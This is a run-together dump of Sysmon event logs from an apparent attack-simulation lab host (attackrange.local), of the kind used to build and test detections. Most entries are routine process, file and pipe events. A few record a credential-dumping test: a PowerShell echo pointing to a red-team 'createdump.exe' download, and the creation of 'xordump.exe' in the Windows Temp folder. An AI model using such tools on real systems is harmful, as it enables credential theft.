21:10:06.186{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025298Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:06.186{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025297Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:06.186{4DB9351A-9E1D-60D3-8B00-00000000CF01}47084724C:\Windows\system32\csrss.exe{4DB9351A-A32E-60D3-4906-00000000CF01}5716C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000025296Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:06.186{4DB9351A-A273-60D3-3C05-00000000CF01}66084360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-A32E-60D3-4906-00000000CF01}5716C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beaa995(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beaa7fc(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bf3392d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bea2a82(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9c982034(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be6802a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9becba9c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bead93c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be9e65c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bedacff(wow64) 154100x800000000000000025295Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:06.200{4DB9351A-A32E-60D3-4906-00000000CF01}5716C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {echo \"".NET 5 must be installed manually.\"" \""For the very brave a copy of the executable can be found here: https://github.com/Scoubi/RedTeam-Tools/blob/main/createdump.exe\""} C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{4DB9351A-9F2A-60D3-AB7C-0C0000000000}0xc7cab2HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 11241100x800000000000000025294Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:06.186{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\art-err.txt2021-06-23 21:09:49.615 11241100x800000000000000025293Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:06.186{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\art-out.txt2021-06-23 21:09:49.615 23542300x800000000000000025292Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:06.170{4DB9351A-A32D-60D3-4806-00000000CF01}2080ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000025291Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:06.123{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=7A0F5C084F57B2DCF812253F3EA2014C,SHA256=F50BCCC60CCD79A623E62F6E94FAE0EA50C4AF03C154AE36E09A9CBB81A20BF6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000025290Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:06.092{4DB9351A-9DDE-60D3-1600-00000000CF01}12921448C:\Windows\system32\svchost.exe{4DB9351A-A32D-60D3-4806-00000000CF01}2080C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025289Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:06.092{4DB9351A-9DDE-60D3-1600-00000000CF01}12921340C:\Windows\system32\svchost.exe{4DB9351A-A32D-60D3-4806-00000000CF01}2080C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025288Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:06.045{4DB9351A-9DDB-60D3-0B00-00000000CF01}628832C:\Windows\system32\lsass.exe{4DB9351A-A32D-60D3-4806-00000000CF01}2080C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025287Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:06.045{4DB9351A-9DDB-60D3-0B00-00000000CF01}628832C:\Windows\system32\lsass.exe{4DB9351A-A32D-60D3-4806-00000000CF01}2080C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 17141700x800000000000000025286Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-CreatePipe2021-06-23 21:10:05.998{4DB9351A-A32D-60D3-4806-00000000CF01}2080\PSHost.132689562057579571.2080.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 11241100x800000000000000025379Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localEXE2021-06-23 21:10:07.967{4DB9351A-A32F-60D3-4C06-00000000CF01}2508C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\Temp\xordump.exe2021-06-23 21:10:07.967 10341000x800000000000000025378Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:07.483{4DB9351A-9DDE-60D3-1600-00000000CF01}12921448C:\Windows\system32\svchost.exe{4DB9351A-A32F-60D3-4C06-00000000CF01}2508C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025377Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:07.483{4DB9351A-9DDE-60D3-1600-00000000CF01}12921340C:\Windows\system32\svchost.exe{4DB9351A-A32F-60D3-4C06-00000000CF01}2508C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025376Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:07.452{4DB9351A-9DDB-60D3-0B00-00000000CF01}628676C:\Windows\system32\lsass.exe{4DB9351A-A32F-60D3-4C06-00000000CF01}2508C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025375Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:07.452{4DB9351A-9DDB-60D3-0B00-00000000CF01}628676C:\Windows\system32\lsass.exe{4DB9351A-A32F-60D3-4C06-00000000CF01}2508C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 17141700x800000000000000025374Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-CreatePipe2021-06-23 21:10:07.420{4DB9351A-A32F-60D3-4C06-00000000CF01}2508\PSHost.132689562073410165.2508.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x800000000000000025373Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:07.405{4DB9351A-A32F-60D3-4C06-00000000CF01}2508ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_jck0jj03.sgh.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000025372Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:07.405{4DB9351A-A32F-60D3-4C06-00000000CF01}2508ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_miqch3dd.sej.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000025371Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:07.389{4DB9351A-A32F-60D3-4C06-00000000CF01}2508C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_miqch3dd.sej.ps12021-06-23 21:10:07.389 10341000x800000000000000025370Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:07.373{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A32F-60D3-4C06-00000000CF01}2508C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025369Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:07.342{4DB9351A-A273-60D3-3D05-00000000CF01}58325828C:\Windows\system32\conhost.exe{4DB9351A-A32F-60D3-4C06-00000000CF01}2508C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025368Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:07.342{4DB9351A-A273-60D3-3C05-00000000CF01}66084360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-A32F-60D3-4C06-00000000CF01}2508C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+381e70|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2f8cd5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c3b1e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c01f5|UNKNOWN(00007FFF5B97FD63) 10341000x800000000000000025367Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:07.327{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025366Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:07.327{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025365Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:07.327{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025364Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:07.327{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025363Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:07.327{4DB9351A-9E1D-60D3-8B00-00000000CF01}47086292C:\Windows\system32\csrss.exe{4DB9351A-A32F-60D3-4C06-00000000CF01}2508C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000025362Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 